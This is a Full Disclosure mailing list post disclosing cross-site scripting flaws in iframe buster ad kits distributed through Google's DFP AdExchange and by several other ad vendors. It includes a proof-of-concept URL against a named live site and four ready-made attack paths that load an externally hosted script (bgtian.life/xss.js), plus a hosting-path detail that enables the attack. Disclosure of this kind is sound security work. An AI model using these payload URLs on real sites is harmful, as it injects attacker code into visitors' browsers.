Some more details: 1) The google article seems to link the problematic kit only in non-english local (check the french version or spanish one) 2) In order for predicta to work, you should host your javascript on a specific path: /mrm-ad/commons.js
2017-12-19 15:24 GMT+01:00 Zmx <[email protected]>: > Hi list, > > The DFP AdExchange service of Google (the service who provide ads) is > distributing an "Iframe Buster Kit" in order to allow iframe ads to expand > outside of the iFrame. > > This needs some bypass of the restriction applied to iframe, so Google > provide a kit to install on your website: > - Help Document: https://support.google.com/dfp_premium/answer/1074250 > - Kit: https://storage.googleapis.com/support-kms-prod/ > DB3CE51C3A5F783ED8198CDA753995FEB913 > > The kit contains several html and js files to be hosted on your domains. > > Some of those files (still provide by Google, remember) contains very > visible XSS code: > One of them is "predicta" that simply allow you to pass the domain of from > where to load the javascript. > > > Quick proof of concept: > - https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life > > As expandable ads allow website to gain more ads revenue, those kits is > present in a lot of website. > > Other "iframe buster kit" exist that are not provided by Google, and some > of them are also vulnerable. > > From my list I have: > - /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js > - /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js > - /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look > like different version exist however) > - /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js > > > Some source: > - Code of predicta_bf.html provide by Google in the kit: > https://pastebin.com/BggXDHNA > - Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b > - Code of rockabox: https://pastebin.com/xqhs3zyz > > Tr4L > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
